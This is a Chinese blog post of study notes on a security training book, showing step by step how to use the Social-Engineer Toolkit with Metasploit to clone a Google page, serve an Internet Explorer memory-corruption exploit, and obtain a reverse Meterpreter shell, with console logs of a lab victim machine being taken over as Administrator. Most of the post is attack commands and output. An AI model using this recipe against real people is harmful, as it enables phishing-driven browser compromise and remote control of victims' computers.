好记性不如铅笔头

安全, 操作系统

某《魔鬼训练营》读书笔记:setoolkit生成漏洞网页

!!!笔记仅供学习交流使用,请勿进行其他用途!!!

setoolkit是一个非常有用的社会工程学工具,里面有很多工具,这里作者只笔记下其最简单的使用方法。

setoolkit和Metasploit协同生成渗透网页流程:

        Welcome to the Social-Engineer Toolkit (SET). 
         The one stop shop for all of your SE needs.

     Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
。。。。。。。
set> 1 #选项1

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
。。。。。。。
set> 2 #选项2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
。。。。。。
set:webattack>2 #选项2,直接生成渗透网页攻击浏览器

   1) Web Templates
。。。。。。。
set:webattack>1 #简单起见,使用现有模板

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo

set:webattack> Select a template:2 #克隆google

 Enter the browser exploit you would like to use [8]:

。。。。。。。
  33) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
  34) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
  35) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
。。。。。。。

set:payloads>34 #使用34号漏洞

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
。。。。。。。

set:payloads>2 #Meterpreter
set:payloads> Port to use for the reverse [443]:
。。。。。。。
[-] This may take a few to load MSF...
。。。。。。。
。。。。。。。
resource (/root/.set/meta_config)> exploit -j  #可以看到,setoolkit自动启动Metasploit,然后生成后台任务
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) > 
[*] Started reverse handler on 192.168.19.128:443 
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.19.128:8080/
[*] Server started.

msf exploit(ms09_002_memory_corruption) > #当有IE浏览器浏览该漏洞网页时,会触发该漏洞
[-] 192.168.19.129   ms09_002_memory_corruption - Exception handling request: Connection reset by peer
[*] 192.168.19.129   ms09_002_memory_corruption - Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
[*] 192.168.19.129   ms09_002_memory_corruption - Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
[*] Sending stage (769024 bytes) to 192.168.19.129
[*] Meterpreter session 1 opened (192.168.19.128:443 -> 192.168.19.129:1226) at 2014-06-01 23:26:09 +0800
 #session被打开了
[*] Session ID 1 (192.168.19.128:443 -> 192.168.19.129:1226) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1364)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 572 #meterpreter被自动转移到其他进程了
[+] Successfully migrated to process 

msf exploit(ms09_002_memory_corruption) > sessions #查看session

Active sessions
===============

  Id  Type                   Information                                Connection
  --  ----                   -----------                                ----------
  1   meterpreter x86/win32  WINXP-PRO-VM\Administrator @ WINXP-PRO-VM  192.168.19.128:443 -> 192.168.19.129:1226 (192.168.19.129)

msf exploit(ms09_002_memory_corruption) > sessions -i 1 #交互
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP-PRO-VM\Administrator

 

发表评论

3 × 4 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据